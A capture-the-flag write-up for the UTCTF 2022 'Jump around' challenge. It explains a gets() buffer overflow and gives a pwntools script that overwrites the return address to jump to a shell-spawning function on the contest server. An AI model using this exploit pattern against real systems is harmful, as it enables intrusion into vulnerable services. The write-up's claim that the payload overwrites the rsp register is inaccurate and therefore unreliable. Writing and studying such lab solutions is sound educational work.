UTCTF 2022 — Writeup

I did some challenges in the UTCTF so I would like to share the writeup of those.

1. Jump around

This is beginner challenge which is based on the buffer overflow attack.

We have the binary file. To analysis it we can use software like Ghidra or IDA. I used to ghidra and viewed the functions through the decompiler.

We have the main function which is not more informative and looks more straight forward it the input from user.

When I observed the functions available in the binary. I found the ‘get_flag’ function which is suspicious.

So, it basically calls the system function with ‘/bin/sh’. This is the vulnerability which will give us the shell access to server.

As we know the gets() function which vulnerable to buffer overflow attack, we can exploit it. I wrote a script to get the interactive shell.

from pwn import *
r = remote('pwn.utctf.live', 5001)
r.recvuntil('drill')
e = elf.ELF('./jump')
payload = b'a'*120 + p64(e.symbols['get_flag']) + b'\n'
r.sendline(payload)
r.interactive()

We create a payload with two things one is we have overflow the buffer to modify the rsp address which will point to next address after the gets() function is executed. So, we have to jump to get_flag() function to get the shell. We know the buffer size is 112. Since it is 64 bit binary 112+8 will overflow the rbp (the base pointer), next is rsp (stack pointer). We write the rsp register with the address of get_flag() function address. Then we send this payload to the server.